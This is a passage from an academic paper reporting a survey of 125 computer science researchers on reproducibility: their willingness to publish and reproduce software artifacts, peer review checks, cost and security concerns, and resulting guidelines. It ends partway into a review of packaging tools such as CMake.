http://dx.doi.org/10.7717/peerj-cs.240 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ RQ1 addresses the aspects of the relevance of reproducibility to a researcher’s field, willingness to contribute to making one’s own work reproducible, and possible concerns. An online survey was designed to assess the current practice, subject awareness, and possible concerns. The focus of the survey was on the disciplines computer science, computer engineering, and electrical engineering and it addressed researchers at different positions in universities, research institutions, and companies. To answer RQ2, we present three examples where three different types of software projects are packaged to provide an accurate and easy possibility for reproducing results in a controlled environment and analyze how these solutions address the requirements derived from the survey. The responses to our online survey confirm our initial assumption that the reproducibility of research results is an important concern in computer science research. One of the researchers’ main reasons for publishing software artifacts along with scientific publications is improved credibility and reliability of results. Based on the survey’s results presented in the section “Survey”, we infer requirements and general guidelines assisting researchers in making their research reproducible in the section “Requirements and General Guidelines”. Finally, we discuss how different tools comply with the created requirements and guidelines. We find that due to conflicting requirements, none of the presented solutions fulfills all intended goals perfectly. One of the most pressing challenges is to achieve long term availability of results while respecting licensing issues of required third-party dependencies. An in-depth discussion of open issues is elaborated in the section “One Tool to Reproduce them All?” and we conclude the article and highlight our major findings in the section “Conclusion”. RELATED WORK Walters (2013) notes that it is often difficult to reproduce the work described in molecular modeling and chemoinformatics papers. For the most part this is due to the absence of a disclosure requirement in many scientific publication venues thus far. Morin et al. (2012) report that in 2010 only three of the 20 most cited journals had editorial policies requiring availability of source code after publication. Fortunately, this situation is changing for the better, for example Science introduced a policy requiring authors to make data and code related to their publication available whenever possible (Witten & Tibshirani, 2013; Peng, 2011; Hanson, Sugden & Alberts, 2011). Commenting on this policy, Shrader- Frechette & Oreskes (2011) brought up the issue that although privately funded science may be of high quality, it is not subject to the same requirements for transparency as publicly funded science. Another obstacle is the use of closed-source tools and undisclosed software results in publicly funded research software development projects as discussed by Morin et al. (2012). Vitek & Kalibera (2011) address the topic of repeatability and reproducibility for systems research and identify a particular difficulty for embedded systems due to companies being reluctant to release code and that implementations are often bound to specific hardware. Focusing on the current state of reproducibility, ACM SIGCOMM Computer Communication Review (CCR) conducted a survey on reproducibility with 77 responses from authors of papers published in CCR and the SIGCOMM sponsored conferences Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 2/27 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ (Bonaventure, 2017). The responses showed that there is a good awareness of the need for reproducibility and a majority of authors either considered their paper self-contained or have released the software used to perform experiments. However, there were only few releases of experimental data or of modifications of existing open source software. The open question part of the survey indicated a need for encouragement for publishing reproducible work or for papers that attempt to reproduce or refute earlier results. Flittner et al. (2018) conducted an analysis of papers from four different ACM conferences held in 2017. This study found that the type of artifacts can differ significantly between different communities. The analysis further indicates that even if researchers state that their work is reproducible, the majority of analyzed papers do not provide the complete toolset to reproduce all results. Most importantly, the study shows that published artifacts are indeed reused, which is why the authors encourage others to release artifacts. A critical aspect when releasing artifacts is to decide on tools supporting researchers in the process of making research reproducible. Several papers report on case studies for data repositories in the context of reproducibility including fields such as geographic information systems (Steiniger & Hunter, 2013), astrophysics (Allen & Schmidt, 2015), microbiome census (McMurdie & Holmes, 2013), and neuroimaging (Poline et al., 2012). These examples are promising, but it cannot be expected that the approaches are going to be used beyond the field they have been introduced. Simflowny (Arbona et al., 2013) is a platform for formalizing and managing the main elements of a simulation flow, tied not to a field, but to a specified simulation architecture. The Whole Tale approach (Brinckman et al., 2018) aims at linking data, code, and digital scholarly objects to publications and integrating all parts of the research story. Other works focus on code and data management, such as Ram (2013) suggesting very general version control systems such as Git for transparent data management in order to enable reproducibility of scientific work. The CARE approach (Janin, Vincent & Duraffort, 2014) extends the archiving concept with an execution system for Linux systems, which also takes software installation and dependencies into account. Docker (Boettiger, 2015), which will be examined more closely in this article, provides an even more generic approach by utilizing virtualization for providing cross-platform portability. A tutorial for using Docker to improve reproducibility in software and web engineering research was published in Cito, Ferme & Gall (2016). Reprozip by Chirigati, Shasha & Freire (2013) provided a packing and unpacking mechanism for Linux systems allowing the creation of a package from a computer experiment which can be unpacked on another target machine, including support for unpacking into a Docker image. In contrast to the work presented above, our work focuses on the researchers’ requirements regarding reproducibility independent of the capabilities of individual tools. Based on survey responses, we infer requirements and guidelines for making research reproducible and further analyze how different tools for packaging software artifacts comply with the researchers’ needs. We further identify limitations of current tools and raise awareness of researchers on the pros and cons of using different types of applications for making research reproducible. Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 3/27 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ SURVEY In computer science, a large amount of research is backed up by prototypes, implementations of algorithms, benchmarking and evaluation tools, and data generated in the course of research. A critical factor for cutting edge research is to be able to build upon the results of other researchers or groups by extending their ideas, applying them to new domains or by reflecting them from a new angle. This is easily done with scientific publications, which are mostly available online. While the hypotheses, findings, models, processes, and equations are published, the data generated and the tools used for generating data and evaluating new approaches are sometimes only pointed out but have to be found elsewhere. Our hypothesis in that direction is that there is a gap between scientific publishing on one hand and the publication of software artifacts and data for making results reproducible for other researchers on the other. In that sense, we created a survey asking researchers in the computer science field for their approach and opinion. Methodology The survey design is driven by our research question RQ1 (“To what extent is reproducibility of results based on software artifacts important in the field of computer science and in related research areas?”). The survey consists of five parts. First, basic demographic information, including the type of research, the area of research, the typical research contribution, and the type of organization the researchers are working for, is collected. Second, the common practice of the researchers for publishing software artifacts and data is surveyed. Third, we focus on the researchers’ expectations regarding the procedure of reproducing scientific results. Fourth, we ask for opinions on integrating the question of reproducibility in the peer review process. Finally, we collect additional thoughts with open questions. Five-point Likert scales are used to indicate the level of agreement in the survey. For questions where Likert scales are not applicable, single-choice or multiple-choice questions (e.g., “What are the typical results of your research work?”), or numerical inputs without predefined range or categories (e.g., “How much time (in hours) are you willing to invest to make the results of a paper reproducible?”) are used. Generally, we did not offer a “I don’t know” or similar option. For single-choice and multiple-choice questions we discussed the nominal scales based on related work as well as the authors’ experience. Pilots with people neither involved with the questionnaire nor taking part in the final survey were conducted to reduce the chance of leaving out important options. For the sake of completeness, custom values are allowed in addition to the given options, to allow researchers to report on their practice. Open-ended questions are only used where other types of questions might limit the spectrum of answers. The survey was set up as an anonymous online survey, with no partial answers allowed as all questions were mandatory and only the final submission at the end of the survey would save the results. The survey was distributed via a scientific mailing lists and via personal contacts with the request to distribute the survey among colleagues1. The full survey and all responses are included in the Supplemental Material. 1 The online survey was distributed on the following channels: Information-Centric Networking research group discussion list (https://www.irtf.org/mailman/ listinfo/icnrg); the Google Group comp. simulation (https://groups.google.com/ forum/#!forum/comp.simulation); the authors’ Facebook and Twitter profiles; and via personal contacts. Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 4/27 http://dx.doi.org/10.7717/peerj-cs.240#supplemental-information https://www.irtf.org/mailman/listinfo/icnrg https://www.irtf.org/mailman/listinfo/icnrg https://groups.google.com/forum/#!forum/comp.simulation https://groups.google.com/forum/#!forum/comp.simulation http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ Demographics In total, we received 125 responses, mostly from academic researchers. The demographics of survey participants are visualized in Fig. 1. Seventy-four out of the 125 participants were working or studying at a university and 35 of 125 of research institutes. Thirteen participants noted that they were mainly working for a company, two were private researchers, one from a school. With their position, 30% of the participants were PhD students, 28% were professors or group leaders, 17% worked as researchers within a project, 12% were principal investigators, and 9% were bachelor or master students at the time of the study. Three participants were heads of departments or organizations, and two participants indicated that they were postdoctoral researchers. Computer science or computer engineering was the area of research for 72% of the participants. Regarding the area of research, 7.2% of the participants came from electrical engineering, 4% from information systems, 3.3% from (applied) mathematics, and 1.6% from simulation. Furthermore, singular mentions were applied informatics, ciencias sociales, computational biology, computational biology/numerical simulations, computer networks, data analysis, economics, management, materials science, mathematical modeling, medical informatics, physics, scientific computing, and user experience. The population also includes researchers for whom publishing software is common practice; 28% of the participants have indicated that they have not published any software artifact at the time of the study. Survey result summary Four aspects of the survey responses are analyzed. First, the relevance of reproducibility for the research community is analyzed. Second, we investigate what people are willing to do in order to achieve reproducible research. Third, we discuss the researchers’ opinions on reproducibility in the peer review process. Finally, we highlight concerns regarding sharing scientific software artifacts. Figure 2 summarizes the responses to questions showing the relevance of reproducibility in research. As can be seen, the majority of people wants to reproduce results from other researchers or groups: 103 of 125 indicated agreement. Even more (110 out of 125) considered reproducible results as added value for research papers. It can 0 10 20 30 Number of responses Other Head of Department / Organisation Bachelor or Master student Principal investigator Researcher employed in a project Professor / Group leader PhD student (A) Positions 0 20 40 60 Number of responses Other Information Systems Electrical Engineering Computer Engineering Computer Science (B) Area or Research 0 20 40 60 Number of responses School I'm a private researcher Company Research institute University (C) Research Environment Figure 1 Demographics of the survey participants including positions (A), area of research (B) and research environment (C). For presentation reasons, categories with less than three researchers were summarized as “Other” in (A) and (B). Full-size DOI: 10.7717/peerj-cs.240/fig-1 Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 5/27 http://dx.doi.org/10.7717/peerj-cs.240/fig-1 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ be seen that the majority of researchers (96 out of 125) wants to build their research on the work of others, which requires others to share scientific artifacts. It can be seen from the researchers’ demographics in Fig. 3 that the relevance of reproducibility is independent of a researcher’s position, research area, and research environment. The results of the question “I want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work” were grouped by position, research area, and research environment. These distributions look very similar for all questions from Fig. 2. A full collection of graphical illustrations of these distributions is included in the Supplemental Material of the paper. An open-ended question asking why software artifacts should be published yielded diverse answers. The most frequent answers were improvements in credibility and reliability of results, building trust, and improving understanding of the results of others. Besides, answers included the benefit of a practical approach by fostering task-based research, increasing visibility for your research by making tools available and open communication to foster research in general. After showing the researchers’ interests in reproducibility, which are aligned with the results from other published surveys, we now evaluate what researchers are willing to do to make their results reproducible for others and how much effort they are willing to invest to reproduce the results of others. Focusing on Fig. 4, we see that about half of the researchers typically try to reproduce the results of others by running their tools (53 out of 125). This again shows the demand for publishing scientific software artifacts. The average amount of time participants would invest in making software of others work to reproduce results was 23.12 hours, neglecting two outliers who would spend 105 and 81 29 10 1 4 57 46 17 2 3 strongly agree agree neutral disagree strongly disagree Published software artifacts are added value to the published text in the research paper. 47 49 21 5 3 I want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work. I want to build my research tools by extending on the work (software, tools, or frameworks) of other researchers or groups. Figure 2 Responses to questions focusing on the general relevance of reproducibility. Full-size DOI: 10.7717/peerj-cs.240/fig-2 strongly agree agree neutral disagree strongly disagree (A) Position All responses Other Professor / Group leader Principal investigator Researcher employed in a project PhD student Bachelor or Master student 57 3 14 8 12 15 5 46 2 15 5 8 13 3 17 6 1 1 7 2 2 2 3 1 1 1 (B) Area of Research All responses Other Electrical Engineering Computer Engineering Computer Science 57 8 2 7 40 46 11 5 9 21 17 6 2 2 7 2 1 1 3 1 2 (C) Research Environment All responses Other Company Research institute University 57 1 7 18 31 46 1 2 12 31 17 3 5 9 2 2 3 1 1 1 Figure 3 Responses to the question “I want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work.” grouped by researchers’ positions (A), research area (B) and research environment (C). Full-size DOI: 10.7717/peerj-cs.240/fig-3 Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 6/27 http://dx.doi.org/10.7717/peerj-cs.240#supplemental-information http://dx.doi.org/10.7717/peerj-cs.240/fig-2 http://dx.doi.org/10.7717/peerj-cs.240/fig-3 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ 1035 or more hours2. The responses to the corresponding survey questions are visualized in Fig. 5A. Two participants noted that they would invest more than a month of work time (>160 h) to reproduce results of others, 10 participants noted that they would invest between a week and a month (41–160 h), 42 participants would invest up to a week, but less than a day (9–40 h), 47 would invest up to a day of work (1–8 h) and only three participants would not invest any time at all. Most researchers agreed they would like to publish their software to aid reproducibility. The question of whether researchers want to publish their software tools to allow others to reproduce their results was answered with agreement from the majority of researchers (103 out of 125) with only 16 disagreeing. When publishing software, 102 out of 125 researchers intend to provide detailed documentation on how to install and run the published software artifact. The question of how many hours researchers want to invest in making their results reproducible led to an average of 24.4 hours. We excluded three outliers with answers of 1,000, 106, and 1025 hours as we agreed that the answer of 1,000 hours—in other words 25 work weeks—and more is more likely to be a misunderstanding of the question and may include the original research work in addition to the extra work of making the results reproducible. The results can be seen in Fig. 5B. Summarizing the results in clusters results in two participants investing more than a month of work time (>160 h), seven participants would invest up to a month (41–160 h), 49 participants indicating they would invest up to week of work time (9–40 h), 38 participants reporting to invest up to a day (1–8 h), and only four indicating that they would not invest any time. Interpreting these numbers, we see that researchers are willing to invest more time to make their own research reproducible than to reproduce the results of others. strongly agree agree neutral disagree strongly disagree I typically try to reproduce the research results of other groups or researchers by installing and running their tools. 21 32 41 23 8 66 36 11 7 5 When I publish software I intend to provide detailed documentation on how to install and run the software. 74 29 6 9 7 I want to publish software tools an methods from my research to allow others to reproduce my results Figure 4 Responses to questions focusing on what researchers are willing to do to achieve reproducible results or to share artifacts. Full-size DOI: 10.7717/peerj-cs.240/fig-4 0 20 40 60 80 100 120 Responses ranked by value 1 10 100 1000 Ti m e [h ] a) How much time (in hours) are you willing to invest into reproducing a result or get the software tools of others installed and running? 0 20 40 60 80 100 120 Responses ranked by value 1 10 100 1000 Ti m e [h ] b) How much time (in hours) are you willing to invest to make the results of a paper reproducible? 0 20 40 60 80 100 120 Responses ranked by value 1 10 100 1000 Ti m e [y ea rs ] c) How long (in years) do you think software for reproducing research results should be runnable / compilable / available? A B C Figure 5 Responses to the above questions on how much hours researcher would invest into reproducing (A) and making reproducible (B) as well as how many years result should be reproducible (C). Note that the y-axis is logarithmic. Full-size DOI: 10.7717/peerj-cs.240/fig-5 2 Using the range of mean ± 3 times standard deviation for outlier detection Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 7/27 http://dx.doi.org/10.7717/peerj-cs.240/fig-4 http://dx.doi.org/10.7717/peerj-cs.240/fig-5 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ The results of a multiple-choice question asking for the typical composition of research results shows that software implementations and datasets are already common artifacts of today’s research, indicating the potential utility of making research reproducible. Besides results in written form—107 researchers mentioned published papers and 37 participants reports with detailed results—a software implementation is part of the research results for 87 participants and 47 participants mentioned a dataset being part of their results. Another important aspect for reproducible research is the long-term availability of results and artifacts. The effort of preparing and publishing software artifacts and results would ultimately be in vain if the artifacts later become inaccessible. Participants were asked about their opinion on how long results and necessary software artifacts should be available after initial publication. The results can be seen in Fig. 5C. With the exception of five outliers (with seven answers of 0 for not supporting reproducibility at all, as well as 106, 109, and 1025 years, which is too long a time for all currently known digital storage media to survive), the participants stated that software for reproducing results should be available for an average of 9.1 years. Summarizing through clusters 18 participants stated it should be from 0.5 to 2 years, 67 indicated it should be 3–5 years, 26 state 6–10 years, and nine think it should be more than 10 years available. Asked about how they share research artifacts or make results reproducible, 90 out of 125 participants stated to have already published software at the time of their participation in the survey. Means of making their results reproducible were—multiple means could be specified—detailed instructions (68), make scripts (54), installation scripts (34), virtualization software (29), and container frameworks (15). There were two mentions of hosting web front ends as means of making results available and three mentions of public source code repositories as platforms for distribution. Now that we are aware of current practices for making results reproducible, we focus on the role of reproducibility in the peer review process. Our assumption is that testing for reproducibility during the peer review process could enhance the credibility of published results and thereby increase the quality of a paper. This opinion is shared by the survey participants as visualized in Fig. 6: A total of 87 out of 125 participants stated that checking for reproducibility should be part of the peer review process. Furthermore, 79 out of 125 participants would be willing to check results in addition to the traditional peer review process. Here, differences among different positions and research areas can be found (see Fig. 7). When focusing on the researchers’ position, nine out of 10 bachelor or master students showed agreement, with none indicating disagreement. Principal investigators indicated the lowest agreement. Differences can also be seen regarding different research areas. Researchers from computer engineering showed the least agreement, whereas electrical strongly agree agree neutral disagree strongly disagree 34 45 18 14 Checking for reproducibility of research results should be part of a peer review process. 35 52 23 7 1 As a reviewer I would be willing to check research results in addition to the traditional peer review. 7 Figure 6 Responses on questions focusing on the role of reproducibility in the peer review process. Full-size DOI: 10.7717/peerj-cs.240/fig-6 Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 8/27 http://dx.doi.org/10.7717/peerj-cs.240/fig-6 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ engineers indicated the most agreement. Researchers from other research areas, including computer science, indicated a similar interest. No differences between different research environments were identified. When analyzing the survey results on the researchers’ concerns regarding publishing scientific software artifacts, we can see that the traditional payment models of scientific publishers used for research papers are seen as critical for publishing software artifacts. Figure 8 shows that 104 out of 125 researchers indicate that their results can be reproduced with free and open source software. This goes hand in hand with researchers’ reluctance to pay for publishing or accessing software artifacts. Only 24 out of 125 researchers are willing to pay for making software tools, frameworks, and subsequently their results to be available to other researchers. A few more, but still only 28 out of 125 researchers indicate agreement with paying for being able to reproduce the results of others. These responses indicate the importance of possibilities for sharing software artifacts free of charge regardless of the platform. Moreover, even researchers willing to pay for software, might face problems due to closed-source components or other limitations. Continuing in this vein, we asked why results cannot be reproduced using open source tools. A total of 50 participants indicated the use of paid-for programming language environments, 35 the use of licensed operating systems, 19 the use of copyrighted materials, and 11 the use of commercial tools. Computer security, when installing programs from others, is not a major concern for 69 out of 125 participants, which is alarming when reflecting on possible security issues. An explanation could be that the researchers’ awareness is low because they themselves would not harm others and believe others to be benevolent as well. However, this mindset does not account for security issues that do not originate from other researchers, but from strongly agree agree neutral disagree strongly disagree (A) Position All responses Other Professor / Group leader Principal investigator Researcher employed in a project PhD student Bachelor or Master student 34 1 7 4 7 12 3 45 4 13 2 9 11 6 18 6 2 2 7 1 14 5 3 3 3 7 1 2 2 2 (B) Area of Research All responses Other Electrical Engineering Computer Engineering Computer Science 34 9 2 3 20 45 10 6 3 26 18 4 1 3 10 14 2 6 6 7 1 1 5 (C) Research Environment All responses Other Company Research institute University 34 1 4 10 19 45 5 14 26 18 1 2 3 12 14 1 5 8 7 1 1 1 4 Figure 7 Responses to the question “As a reviewer I would be willing to check research results in addition to the traditional peer review.” grouped by the researchers’ position (A), research area (B) and research environment (C). Full-size DOI: 10.7717/peerj-cs.240/fig-7 strongly agree agree neutral disagree strongly disagree 11 13 34 34 Is it possible to reproduce your research results with fre e and open source software? 51 53 15 5 1 I am willing to pay for open access to my research software tools and frameworks to make them available to other researchers. 33 7 21 37 26 I am willing to pay for easily accessible software tools and for being able to reproduce the results of other researchers. 34 30 26 31 27 Local computer security and local data security is a major concern for me when installing and running software from other researchers. 11 Figure 8 Responses to questions focusing on additional concerns when publishing scientific artifacts. Full-size DOI: 10.7717/peerj-cs.240/fig-8 Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 9/27 http://dx.doi.org/10.7717/peerj-cs.240/fig-7 http://dx.doi.org/10.7717/peerj-cs.240/fig-8 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ used third-party libraries. Therefore, software from unknown sources, or with unknown dependencies, should always be handled with care. We further see that security awareness depends on the researchers’ position (see Fig. 9). Undergraduate and master students indicate the highest awareness of security risks, while professors and principal investigators the lowest. A possible interpretation is that researchers in higher positions neglect security issues because of the high pressure to progress research. Students, in contrast, focus on smaller tasks and complete them more carefully. Regarding security awareness across different research areas, computer engineers have the highest awareness with 12 out of 19 researchers indicating agreement on the question “Local computer security and local data security is a major concern for me when installing and running software from other researchers.” For other fields, the awareness or lack thereof is almost equally low. Besides economical and security concerns, we also asked researchers about additional reservations. A multiple-choice question on major concerns showed that when installing and running software from other researchers the ease of installation is a prominent topic. This questions allowed for multiple choice as well as an other option, where participants could voice their concerns. Answers included: � Ease of the installation (without major barriers) (104 mentions), � Hardware requirements like computation power, memory, or specialized equipment (71 mentions), � License issues (72 mentions), � Size of the download and installation (27 mentions), � Used harddisk space after installation (two mentions), � I don’t see additional concerns (eight mentions), � Other (with the option of giving text here). Five other answers were entered: � “I am sure it does not run on the first try nine out of 10 times,” � “External dependencies and their updateability/patchability in case of security fixes (should never depend on the initial publisher for third party libraries because they’d strongly agree agree neutral disagree strongly disagree (A) Position All responses Other Professor / Group leader Principal investigator Researcher employed in a project PhD student Bachelor or Master student 30 3 6 1 8 9 3 26 8 4 3 7 4 31 10 4 6 9 2 27 3 7 4 3 8 2 11 4 2 1 4 (B) Area of Research All responses Other Electrical Engineering Computer Engineering Computer Science 30 6 3 5 16 26 2 1 7 16 31 7 3 4 17 27 8 2 1 16 11 3 2 6 (C) Research Environment All responses Other Company Research institute University 30 2 6 6 16 26 1 6 19 31 3 10 18 27 3 11 13 11 1 2 8 Figure 9 Responses to the question “Local computer security and local data security is a major concern for me when installing and running software from other researchers.” grouped by the researchers’ position (A), research area (B) and research environment (C). Full-size DOI: 10.7717/peerj-cs.240/fig-9 Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 10/27 http://dx.doi.org/10.7717/peerj-cs.240/fig-9 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ have to maintain their old packages for a long time); Also important: Downards (sic!) compatibility of “new” versions with old data & tools,” � “Analytical reporoducability (sic!) & mathematical clarity (or correctness) is my main concern,” � “Conflicting versions of additional required software,” � “complex build dependencies.” A final open-ended question was about reservations toward publishing data and software: “I have reservations for publishing software artifacts and data in research because ...” For analysis following the approach of open coding the answers were labeled manually by the authors and the assigned labels were discussed until agreement was reached. The most common cluster of answers noted legal or privacy issues (14). Others pointed out the additional effort needed (8), commercial interests (8), missing reward or support for doing so (3), and that publishing artifacts is not part of the job, that is, not supported by the group or organization (2)3. Regarding the aforementioned legal issues, it would be an interesting hypothesis that researchers would be more willing to share if legal issues and efforts are reduced. This may be achieved by license constraints (only licenses others can build upon) or exceptions for publishing research (leaving license issues aside for research by general agreement). Correlation analysis Given the Likert scales for the answers we did investigate the correlation (Spearman’s rank correlation) between answers to see if (i) intuitive and expected correlations exist and (ii) new and surprising correlations can be found. Table 1 shows all correlations with jρj > 0.44. The strongest correlation to be found with a coefficient of ρ = 0.734 and a p-value < 0.0001 was between the questions “Checking for reproducibility of research results should be part of a peer review process” and “As a reviewer I would be willing to check research results in addition to the traditional peer review.” Hence, people who stated to be willing to do reproducibility checks were more likely to find the idea of a review process with mandatory reproducibility checks attractive. Another strong correlation (ρ = 0.723, p < 0.0001) was found between the questions “How much time (in hours) are you willing to invest into reproducing a result or get the software tools of others installed and running?” and “How much time (in hours) are you willing to invest to make the results of a paper reproducible?” With that correlation one can hypothesize that researchers with reproducibility in mind invest time in reproducing results as well as making their results reproducible. A less strong but still rather interesting correlation (ρ = 0.55, p < 0.0001) was found between “I am willing to pay for open access to my research software tools and frameworks to make them available to other researchers.” and “I am willing to pay for easily accessible software tools and for being able to reproduce results of other researchers.” So with the overhead of participants not willing to pay for access and publishing of in context of reproducibility as indicated in Fig. 8, it is likely that researchers either like the idea of either paying for both, publishing and access, or none. 3 The raw data with all the responses is included in the Supplemental Material. 4 Correlations of jρj < 0.4 are generally considered as poor or weak correlations and hence not included in the table. Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 11/27 http://dx.doi.org/10.7717/peerj-cs.240#supplemental-information http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ Threats to validity While a minor bias is assumed to be caused by the study’s title as participants may have been attracted by the title if they could identify with the topic of reproducibility, it is still valid to discuss the implications of the findings. One possible limitation of the survey is the missing geographical distribution of the participants. We did not include questions on where participants are located or work primarily, and did not collect IP addresses. Hence, we cannot conclude if the survey result indicates a global trend, or if the preferences of researchers from different geographic regions differ. Similarly, a possible gender gap of the survey’s participants can not be evaluated. For single and multiple choice questions with a pre-defined answer set in the survey, the set of answers can introduce a certain bias to the results. Therefore, it was decided to avoid such questions if the risk of bias was high. In that sense, we also avoided quantizing numeric input, for example, the hours people spend making their work reproducible. If it was necessary, we always included an open-ended answer option. The pilot, survey of related work, and critical reflection by the authors were used as tools to minimize the bias. In one single case, that is, the question “Which of the following are Table 1 Correlations in the survey answers with jρj > 0.4 using Spearman’s rank correlation. Questions ρ p-value Checking for reproducibility of research results should be part of a peer review process. 0.734 <0.0001 As a reviewer I would be willing to check research results in addition to the traditional peer review. How much time (in hours) are you willing to invest into reproducing a result or get the software tools of others installed and running? 0.723 <0.0001 How much time (in hours) are you willing to invest to make the results of a paper reproducible? I am willing to pay for open access to my research software tools and frameworks to make them available to other researchers. 0.550 <0.0001 I am willing to pay for easily accessible software tools and for being able to reproduce results of other researchers. I want to publish software tools and methods from my research to allow others to reproduce my results. 0.490 <0.0001 When I publish software I intend to provide detailed documentation on how to install and run the software. I want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work. 0.482 <0.0001 I want to build my research tools by extending on the work (software, tools or frameworks) of other researchers or groups. I want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work. 0.477 <0.0001 I typically try to reproduce the research results of other groups or researchers by installing and running their tools. When I publish software I intend to provide detailed documentation on how to install and run the software. 0.412 <0.0001 I want to build my research tools by extending on the work (software, tools or frameworks) of other researchers or groups. When I publish software I intend to provide detailed documentation on how to install and run the software. 0.410 <0.0001 I typically try to reproduce the research results of other groups or researchers by installing and running their tools. Published software artifacts are added value to the published text in the research paper. 0.408 <0.0001 I want to build my research tools by extending on the work (software, tools or frameworks) of other researchers or groups. Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 12/27 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ additional concerns when installing and running software from other researchers?” the open-ended answer option showed that at least one pre-determined answer was missing. Several participants noted complex build dependencies (also mentioned as conflicting versions of additional required libraries or external dependencies) are likely to be another major concern. Participants could have had overlaps in the categorization of positions, for example a person could be a PhD student and an employed researcher in a project at the same time. In this case participants might have selected the category randomly or selected the category they appreciate more. Despite this, as long as no intentional or unintentional mistakes are made in the answers, each category will contain samples that are member of this category. The survey also includes bachelor and master students, where it is not guaranteed that they are involved in research projects. However, due to the dissemination channels we used for advertising the survey, we assume that the participants are invested in research and reproducibility. This is supported by the study where nine out of 11 bachelor or master students indicate to have already published software artifacts. English as the only language for the survey might be a further limitation. Nevertheless, English is the working language of the target audience, and consequently, we assume the influence by the survey language to be negligible. REQUIREMENTS AND GENERAL GUIDELINES The survey results indicate that a majority of researchers of all levels consider reproducibility as very relevant. There is further a strong interest in doing work to make one’s own results reproducible, a strong interest to use results of others for comparison to own work, and to some extent, a motivation to try to reproduce work for review purposes. To achieve this, it is necessary to make all information that is necessary to reproduce the results available together with a publication. Additionally, the effort necessary to reproduce the results needs to match the value of doing the work. Work reproducing or refuting previous results is overall much less appreciated than original work, so the effort a researcher is willing to invest in order to reproduce previous results is much lower than the effort they are willing to put in to produce new work. On the other hand, when planning to build own research on top of other results the investment can be higher. The most critical case is in reviewing, when reproducibility is intended to be checked as part of the reviewing process. Reviewers have a strict timeline to perform their review, so there is a need for a straightforward, mostly automated process to reproduce results. Moreover, despite contributing to verifying the results of a paper, reviewers are not mentioned in connection with the work. As reviewers work voluntarily, they are probably the least motivated to reproduce results. Moreover, in our study researchers have responded critically to commercial systems introducing payments, either from the publishing researcher side or from the consumer side. A majority of participants also name security as a concern in this context, which highlights an issue to be addressed for researchers being security-aware as well as for those who are less concerned about security. Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 13/27 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ In order to address these issues, the following guidelines are proposed: � Code, data, and information on how to conduct an experiment should be gathered in a single place (a single container), which can be found in connection with the paper. � The reproduction process should be highly automated (for example by an easy to handle build and execution script). � To address security issues, the published artifacts should be provided as source code and scripts allowing for running the code in a virtual environment should be provided. � Commercial libraries and other components that require reviewers to pay for access should be avoided. � Since research papers tend to create some interest even long after they have been published, it is necessary to ensure that software and environment for the reproduction process remain available, either by packing all necessary components into a container or by referring to well-archived open source tools. � The time and necessary information to reproduce results should be tested with an independent person. Unless the size of the project requires it, the reproduction process should take at most 2 days. EXISTING TOOLS Most tools for sharing software artifacts are also used in the development of software artifacts. These could be either tools for simple tasks such as compiling software projects, but also more complex tools for tasks such as automated dependency installation and software packaging. To prevent unnecessarily complex configuration, it is wise to select tools based upon the complexity of the software artifact. Software artifacts which are complex to run require more sophisticated tools with high levels of abstraction, whereas simple artifacts do not require complex tools to run. In this section, we tackle our second research question by presenting four open source tools for sharing software artifacts, ranging from tools for compiling simple artifacts to sophisticated frameworks for sharing self-contained software environments. The tools have been selected despite of their different scopes because of their potential to support reproducible research. It has to be noted that a complex project might even incorporate multiple tools, for example a build system within a virtual environment. We begin with a discussion of simple tools, such as CMake, which are used for build management and continue by discussing tools utilizing a higher level of abstraction. For discussion purposes, well-known tools, each representing a class of tools with similar functionality, were selected. Discussed pros and cons are valid not only for the discussed tool itself, but for the complete class represented by the tool. Finally, we summarize the features of the different tools and discuss the importance of their benefits, according to the survey results presented in the section “Survey”. CMake CMake is a cross-platform build tool based on C++. It is designed to be used with native build environments such as make. Platform-independent build files are used to generate Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 14/27 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ compiler-specific build instructions, which define the actual build process. Main features of CMake are tools for testing, building, and packaging software, as well as the support of hierarchical structures, automatic resolution of dependencies and parallel builds. One drawback of CMake and similar build management systems is that required libraries or other dependencies of software artifacts must be available and installed in the required version on the host system in order to successfully build the project. This could lead to extensive preparations for a build which is mandatory for executing software artifacts. CMake has been chosen for discussion because it is one of the most used tools of this type. Tools with similar functionality are configure scripts, the GNU Build System and the WAF build 